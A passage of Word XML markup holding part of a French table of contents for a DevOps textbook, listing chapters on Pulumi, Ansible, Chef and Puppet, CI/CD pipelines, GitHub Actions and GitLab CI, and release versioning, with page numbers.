        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>74.3 Variables, sorties et modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>654</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>74.4 Lire un plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>655</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>74.5 Organiser à l'échelle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>656</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75. Pulumi : l'infrastructure en langage de programmation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>660</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75.1 Même modèle, autre langage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>660</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75.2 Écrire un programme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>661</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75.3 Ce que le langage apporte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>662</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75.4 État et secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>662</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75.5 Tester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>663</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>76. Ansible : configuration et idempotence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>668</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>76.1 Un inventaire, un playbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>668</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>76.2 Les modules qui comptent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>669</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>76.3 Variables et modèles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>670</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>76.4 Secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>671</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>76.5 Vérifier avant d'appliquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>671</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>77. Gestion de configuration : Chef, Puppet et stratégies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>676</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>77.1 Deux modèles d'exécution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>676</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>77.2 Puppet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>677</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>77.3 Chef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>677</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>77.4 Choisir sans dogme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>678</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>77.5 Migrations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>679</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie V — Livraison, sécurité et exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>78. CI/CD : principes et structure d'un pipeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>683</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>78.1 Trois mots, trois engagements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>684</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>78.2 Le trajet d'un changement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>684</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>78.3 Artefact unique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>686</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>78.4 Déclencheurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>686</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>78.5 Pipelines instables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>687</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79. GitHub Actions et GitLab CI en pratique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>692</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79.1 Anatomie d'un workflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>692</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79.2 Tâches parallèles et matrice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>693</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79.3 Cache et artefacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>694</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79.4 GitLab CI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>694</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79.5 Réutiliser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>695</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>79.6 Sécurité du pipeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>696</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>80. Publications, versions et traçabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>701</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>80.1 Versionner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>701</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>80.2 Publier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>702</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>80.3 Signer et vérifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>702</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>80.4 Notes de version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>703</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>80.5 Retrouver la provenance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
